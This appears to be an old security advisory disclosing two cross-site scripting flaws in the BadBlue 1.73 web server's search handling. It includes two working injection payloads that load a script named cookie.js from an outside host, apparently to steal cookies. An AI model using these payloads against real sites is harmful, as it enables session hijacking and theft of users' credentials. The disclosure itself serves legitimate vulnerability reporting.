Advisory: Variant of BID #5086 Discovered in BadBlue
1.73
As I originally reported in my alert regarding the ext.dll of
BadBlue, it is prone to XSS attacks. EXT.DLL has been
re-written to generate its HTML differently as of BBPE
1.73. Rather than simply placing it in the output, BadBlue
passes the query on to a function called 'cleanSearchString'.
However, two vulnerabilities still exist. One vulnerability
introduced in BBPE 1.73 (cleanSearchString) and another
that wasn't patched from the older versions (the INPUT
vulnerability)
When searching for "<>", we find two locations where our
query is passed as a literal to the browser:
document.write(cleanSearchString('<>'));
<input type=hidden name=a0 value="<>">
In order to exploit the input vulnerability, the query is rather
obvious:
"><script src=http://www.murphy.101main.net/cookie.js></script>
However, don't be fooled by the complexity of the document.write()
call, either, this is still exploitable. :-D
') + '\x3cscript
src=http://www.murphy.101main.net/cookie.js\x3e\x3c/script\x3e'
The Moral of This Story?
No matter how you 'clean' it before writing client-side, if input is
displayed literally at ANY point in the document, it can be used to
divert the flow of execution to an attacker-supplied payload.
"The reason the mainstream is thought
of as a stream is because it is
so shallow."
- Author Unknown
